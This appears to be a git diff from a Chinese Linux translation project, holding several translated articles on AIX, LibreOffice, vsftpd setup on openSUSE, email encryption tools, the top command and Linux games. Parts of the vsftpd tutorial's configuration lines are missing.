IBM 不可能一切都以 AIX 为核心,但他们可能会无限期的延长其使用寿命。如果 AIX 做为开源系统发布,看看市场的反映,将会十分精彩。
via: http://ostatic.com/blog/proprietary-unix-continues-to-fall
译者:[runningwater](https://github.com/runningwater) 校对:[校对者ID](https://github.com/校对者ID)
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高级研究人员分析 LibreOffice 得出的有趣结论
用户、编辑、国务院、团队和城管都正享用着 [LibreOffice][1] 这样一套免费的开源办公套件。而这套办公套件,也因在全球范围内通过越来越多人的使用和积极的反馈,证明了自身的成功。
不但用户们感到 LibreOffice 的不妥协和强大之外,通过“分支之后开源软件社区的可持续发展:LibreOffice 是如何演变的?为什么?”这一文档,认真的研究人员还似乎发现并且把 LibreOffice 描述为真正的成功。
本质上来说。“分支之后的开远软件社区的可持续发展:LibreOffice 是如何演变的?为什么?”是一篇研究 LibreOffice 和它的组成的文档,其中涉及研究的组成部分包括从地位到公众的看法、未来的功能、吸引支持者和参与者的能力。
上述提到的文档得到的结论,自然而然地谈到 LibreOffice 在各个方面的成功,例如:
- “LibreOffice 项目是 OpenOffice.org 项目的一个分支,并没有显示出长期衰退的迹象。”
- “在 OpenOffice.org 中,LibreOffice 吸引了许许多多长期并且非常活跃的提交者。”
- “开源社区比开源软件项目长寿”
- “LibreOffice 被它的社区视为是可支持的、多元化的和独立的”
这份由 Skövde 大学信息研究中心高级研究人员编写的正经的长达60页的文档(可以在[http://www.sciencedirect.com/science/article/pii/S0164121213002744/pdfft...][3]下载)为 LibreOffice 这套健壮的办公套件提供了详尽的、深入且精准的分析。
via: http://iloveubuntu.net/senior-researchers-analyzed-libreoffice-interesting-conclusions
译者:[hyaocuk](https://github.com/hyaocuk) 校对:[校对者ID](https://github.com/校对者ID)
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translated/Setup FTP Server On openSUSE 13.1.md
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translated/Setup FTP Server On openSUSE 13.1.md
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@ -0,0 +1,189 @@
translating by zsJacky
在openSUSE 13.1中配置FTP服务器
**vsftpd** (**非常****安全的****文件****传输****协议****守护进程**) 是Unix/Linux系统中的一个安全快速的FTP服务器。 在这篇 how-to 文章中,让我们看看在openSUSE 13.1中怎样使用vsftpd来配置一个基本的FTP服务器。
### 安装 vsftpd ###
# zypper in vsftpd
启动 vsftpd 服务然后设置让它在每次系统重启时自动启动
# systemctl enable vsftpd.service
# systemctl start vsftpd.service
### 配置 vsftpd ###
# mkdir /srv/ftp
创建一个叫 **ftp-users** 的组。
# groupadd ftp-users
让我们来创建一个叫unixmen的示例用户 并设置其主目录为 **/srv/ftp** 组为**ftp-users**。
# useradd -g ftp-users -d /srv/ftp/ unixmen
# passwd unixmen
使ftp主目录 **/srv/ftp/** 可以被ftp用户所访问。
# chmod 750 /srv/ftp/
# chown unixmen:ftp-users /srv/ftp/
编辑 vsftpd.conf 文件
# nano /etc/vsftpd.conf
#Uncomment and Set YES to enable write.
# Uncomment and Set banner name for your website
ftpd_banner=Welcome to Unixmen FTP service.
# Uncomment
# Uncomment and set YES to allow local users to log in.
# To disable anonymous access, set NO.
# Uncomment to enable ascii download and upload.
## Add at the end of this file ##
### 测试本地FTP服务器 ###
首先 让我们按如下步骤尝试登陆FTP服务器
# ftp localhost
Trying ::1:21 ...
Connected to localhost.
220 (vsFTPd 3.0.2)
Name (localhost:root): unixmen
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
正如你在上面所输出的那样, 我们将能够用unixmen用户登录到ftp服务器。
### 测试远程FTP服务器 ###
默认地 openSUSE内置的防火墙不允许从远程系统登陆FTP。所以让我们允许vsftpd服务通过suse的防火墙。然后我们需要打开: **Yast -> 安全性与用户 -> 防火墙**.
在防火墙界面,进入 **允许服务**. 在区域选择下拉框中,选择 **外部区域** 在服务允许下拉框中,选择 **vsftpd 服务器** 然后点击添加。
sk@sk:~$ ftp
Connected to
220 (vsFTPd 3.0.2)
Name ( unixmen
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
正如你在上面输出中所看到的,我将能够连接到ftp服务器。如果不允许vsftpd服务通过防火墙, 你将会得到一个连接超时的错误。
### 从浏览器连接 ###
### 使用FileZilla连接到FTP服务器 ###
几乎所有的发行版在他们的官方软件仓库中都有filezilla客户端。 为了在基于Linux的系统上安装filezilla 需要键入以下的命令:
$ sudo apt-get install filezilla
$ sudo yum install filezilla
# zypper in filezilla
为了增加安全性,你可以通过将用户添加到 **/etc/vsftpd.chroot_list**文件中来限制特定用户对FTP服务器的访问。
编辑 vsftpd.conf 文件,
nano /etc/vsftpd.conf
# Uncomment and set YES
创建 **文件 /etc/vsftpd.chroot_list**,
nano /etc/vsftpd.chroot_list
# systemctl restart vsftpd.service
如果chroot_list以外的用户想访问FTP服务器, 他们将得到如下的错误。
500 OOPS: could not read chroot() list file:/etc/vsftpd.chroot_list
ftp: Login failed
现在就是这样。 你的FTP服务器已经可以使用了。 享受吧!
via: http://www.unixmen.com/setup-ftp-server-opensuse-13-1/
译者:[zsJacky](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID)
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@ -1,26 +0,0 @@
Briquolo 0.5.7是[可靠的][2]自由软件,可通过Ubuntu软件中心安装(Ubuntu 12.04, Ubuntu 12.04, Ubuntu 13.04, Ubuntu 13.10, Ubuntu 14.04)。
via: http://iloveubuntu.net/test-your-reflexes-briquolo-fast-breakout-game
译者:[Luoxcat](https://github.com/Luoxcat) 校对:[校对者ID](https://github.com/校对者ID)
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translated/Top Email Encryption Tools.md
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translated/Top Email Encryption Tools.md
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电子邮件仍然是 Linux 操作系统下最受欢迎,也是最有效的服务之一。无论何时,与你的朋友、家人还有同事保持联络都是不可或缺的。随着电子邮件敲诈事件的剧增,操作系统对电子邮件的安全与加密工作变得越来越复杂,也越来越重要。保护电子邮件免于未经授权的访问与查阅是关键环节,因为电子邮件管理协议中并未包含加密部分。电子邮件在设计初并未考虑隐私和安全问题。匮乏的安全措施所导致的后果是一封电子邮件既可以存在于发送设备,也可以存在于交互网络、服务器,或者是接收设备上。
OpenPGP 是使用最广泛的电子邮件加密协议标准。无论你使用的是电子邮件客户端,还是 Web 客户端,你都可以通过 OpenPGP 协议来加密你的电子邮件。
很少有哪些电子邮件应用程序会默认安装 PGP 协议。不过幸运的是,Linux 下有不少简单而又易用的开源加密软件。
### 电子邮件加密工具 ###
- [Enigmail][1] Mozilla 系列的 OpenPGP 电子邮件加密软件
- [Mailvelope][2] 谷歌与火狐浏览器的扩展插件
- [GnuPG][3] 加密模糊数据通信
- [Mymail-Crypt for Gmail][4] 简易电子邮件加密软件
via: http://www.linuxlinks.com/article/2013120707481589/EmailEncryption.html
译者:[SteveArcher](https://github.com/SteveArcher) 校对:[校对者ID](https://github.com/校对者ID)
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@ -0,0 +1,46 @@
UNIGINE 可能是 Linux 上最好的游戏引擎
**UNIGINE,是一个实时的 3D 引擎,它能够在所有主流的平台上运行,包括 Linux,并刚刚升级到新的版本,带给了我们一些重要的新特性。**
Unigine 引擎正是由 Unigine 公司开发的, 同时这公司还开发了 Heaven DX11 基准测试软件。 这公司开发的技术总是越来越好,并且随着他们最近在 Linux 平台上的扩展,我们真的很高兴看到这引擎在最近时间作出的重大的更新。
在 UNIGINE 引擎最近作出的更新中,最大的更新是通用图像生成器接口 (Common Image Generator Interface/CIGI) 协议。
据引擎的开发者说,这个接口在模拟行业中,是一种用于主机设备与图像生成器 (IG) 之间通信的标准方法来的。
### 新款 UNIGINE 引擎的亮点 ###
- 在笛卡尔坐标系中增加了对 WGS84,ECF 和 NED 坐标系的支持(这会帮助开发者更好地在用 Unigine 开发的项目中使用实时的 GIS 数据);
- 实施了游戏框架,这样使得游戏更加容易地创建,同时这种特性包括实体与节点的自动链接、层次与世界的自动链接、实体对象管理、贯穿所有层次的游戏全局上下文、事件处理系统、最佳的实体更新等等。
- 增加渲染时帧率的稳定性。
- 两个新的选项,2D 噪音和 3D 噪音(编辑器中的状态选项卡),已被添加到 mesh_leaf_base 材质中。
- 一个新的参数,遮挡屏蔽,已经被添加到所有的材质中。
- 密杂草丛的高度现已实现同步。
- 修复了在渲染非 Flash 闪屏时崩溃的漏洞。
要记住 UNIGINE 引擎只针对商业企业,并不向广大用户提供试用版。
via: http://news.softpedia.com/news/UNIGINE-Is-Probably-the-Best-Gaming-Engine-on-Linux-404484.shtml
译者:[hyaocuk](https://github.com/hyaocuk) 校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -1,290 +0,0 @@
难以置信! 30个top命令示例以及截图
### 1. Top 命令输出: ###
![Top default display](http://linoxide.com/wp-content/uploads/2013/11/01.top_default.png)
First few lines are horizontal showing summary about different system 前几行水平显示了不同系统参数的概括,接下来是进程和它们在列中的属性。
#### 1.1 系统运行时间和平均负载: ####
![Uptime display](http://linoxide.com/wp-content/uploads/2013/11/02.top_uptime.png)
- 当前时间
- 系统运行的时间
- 登陆用户的数量
- 相应最近5、10和15分钟内的平均负载。
#### 1.2 任务: ####
![Task summary](http://linoxide.com/wp-content/uploads/2013/11/03.top_tasks.png)
#### 1.3 CPU 状态: ####
![CPU status display](http://linoxide.com/wp-content/uploads/2013/11/04.top_cpu_states.png)
下一行显示的是CPU状态。 这里显示了不同模式下的CPU时间 %age。这些不同的CPU时间表示:
- us, user: 运行(未调整优先级的) 用户进程的CPU时间
- sy,system: 运行内核进程的CPU时间
- ni,niced:运行已调整优先级的用户进程的CPU时间
- wa,IO wait: 用于等会IO完成的CPU时间
- hi:处理硬件中断的CPU时间
- si: 处理软件中断的CPU时间
- st:被hypervisor偷去用于vm的CPU时间。
#### 1.4 内存使用: ####
![Memory usage](http://linoxide.com/wp-content/uploads/2013/11/05.top_mem_usage.png)
#### 1.5 字段/列: ####
![Top columns](http://linoxide.com/wp-content/uploads/2013/11/06.top_fields.png)
- D - 不可中断的睡眠态。
- R – 运行态
- S – 睡眠态
- T – 被追踪或已停止
- Z – 僵尸态
### 2. 交互命令: ###
#### 2.1 ‘h’: 帮助 ####
![Help options](http://linoxide.com/wp-content/uploads/2013/11/07.top_help.png)
#### 2.2 ‘<ENTER>’ 或者 ‘<SPACE>’: 刷新显示 ####
#### 2.3 A: 触发交替显示模式 ####
1. Def
2. Job
3. Mem
4. Usr
![Alternative display mode](http://linoxide.com/wp-content/uploads/2013/11/08.top_alternative_display.png)
我们可以用'a'和'w'在4个 窗口间切换。'a'移到后一个窗口,'w'移到前一个窗口。用'g'命令你可以输入一个数字来选择当前窗口。
![Window selection in alternative display](http://linoxide.com/wp-content/uploads/2013/11/09.top_alternate_window_selection.png)
#### 2.4 B: 触发粗体显示 ####
Some important information is shown in bold characters. This command toggles use of bold.
![Bold off](http://linoxide.com/wp-content/uploads/2013/11/10.top_bold_display_off.png)
#### 2.5 ‘d’ or ‘s’: 设置显示的时间间隔 ####
当按下'd'或's'时,你将被提示输入一个值(以秒为单位),它会以设置的值作为显示间隔。如果你这里输入了1, top将会每秒刷新。
![Display time interval](http://linoxide.com/wp-content/uploads/2013/11/11.top_display_time_interval.png)
#### 2.6 ‘l’、‘t’、‘m’: 触发负载、任务、内存信息 ####
![Load average off](http://linoxide.com/wp-content/uploads/2013/11/12.top_load_average_display_off.png)
![CPU summary off](http://linoxide.com/wp-content/uploads/2013/11/13.top_cpu_display_off.png)
![Memory and swap usage off](http://linoxide.com/wp-content/uploads/2013/11/14.top_mem_display_off.png)
![All three displays off](http://linoxide.com/wp-content/uploads/2013/11/15.top_all_three_display_off.png)
#### 2.7 ‘f’: 字段管理 ####
![Managing columns](http://linoxide.com/wp-content/uploads/2013/11/16.top_field_management.png)
‘<’ and ‘>’
#### 2.8 ‘R’: 反向排序 ####
#### 2.9 ‘c’: 触发命令 ####
![Full command path](http://linoxide.com/wp-content/uploads/2013/11/17.top_command_name_displayed.png)
#### 2.10 ‘i’: Idle Tasks ####
![Idle task display off](http://linoxide.com/wp-content/uploads/2013/11/18.top_idle_tasks_off.png)
#### 2.11 ‘V’: 树试图 ####
![Forest view of tasks](http://linoxide.com/wp-content/uploads/2013/11/19.top_forest_view.png)
#### 2.12 ‘Z’: 改变颜色映射 ####
![Customizing colors](http://linoxide.com/wp-content/uploads/2013/11/20.top_color_selection.png)
![Colored display](http://linoxide.com/wp-content/uploads/2013/11/21.top_colored.png)
#### 2.13 ‘z’: 触发彩色 ####
#### 2.14 ‘x’ 或者 ‘y’ ####
![X and Y highlighted](http://linoxide.com/wp-content/uploads/2013/11/22.top_x_y_displayed.png)
#### 2.15 ‘u’: 用户的进程 ####
![Processes of 'raghu' user](http://linoxide.com/wp-content/uploads/2013/11/23.top_raghu_processes.png)
#### 2.16 ‘n’ or ‘#’: 任务的数量 ####
![Setting number of tasks displayed](http://linoxide.com/wp-content/uploads/2013/11/24.top_10_processes.png)
#### 2.17 ‘k’: 结束任务 ####
![Killing a task](http://linoxide.com/wp-content/uploads/2013/11/25.top_kill_task.png)
#### 2.18 ‘r’: 重新调整优先级 ####
### 3. 命令行选项: ###
#### 3.1 -b: 批处理模式 ####
#### 3.2 -c: 命令/程序名 触发: ####
#### 3.3 -d: 设置延迟间隔 ####
$ top -d 1
#### 3.4 -i: 空闲进程触发 ####
#### 3.5 -n: 设置迭代数量 ####
$ top -n 3
#### 3.6 -p: 监控特定的PID ####
#### 3.7 -u or -U: 用户名 或者 UID ####
$ top -p 28453 -u raghu
top: conflicting process selections (U/p/u)
via: http://linoxide.com/linux-command/linux-top-command-examples-screenshots/
译者:[geekpi](https://github.com/geekpi) 校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
@ -0,0 +1,41 @@
Unvanquished 可能成为Linux上最好的免费多人游戏
Unvanquished的内部测试版22. 1已经接受了一些改变。包括引擎,游戏设置,一个新地图,一个已有地图的新版本,
### Unvanquished Alpha 22.1的亮点:###
• 喷气机已经被加入。玩家必须按住跳跃键然后飞翔 - 但你不能一直翱翔,你只有有限的燃料;
• 被报告的“受到攻击”消息的原因已经被改变;
• 当接近合适的建筑时,人类的武器将被自动填充或充电,而不是使用;
• 中继器现在是有效的小型反应堆,当周围没有反应堆时,它们能提供能量;
• 在OpenGL 2.1的环境中FXAA和Mesa一起工作。
关于这款看起来让人很惊奇的游戏的更多细节可以在官方网站 [网址][1]上找到。请注意这是一个正在进行中的工作,所以错误是一定会出现的。
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via: http://news.softpedia.com/news/Unvanquished-Will-Probably-Be-the-Best-Free-Multiplayer-Game-on-Linux-405956.shtml
译者:[KayGuoWhu](https://github.com/KayGuowhu) 校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](http://linux.cn/) 荣誉推出
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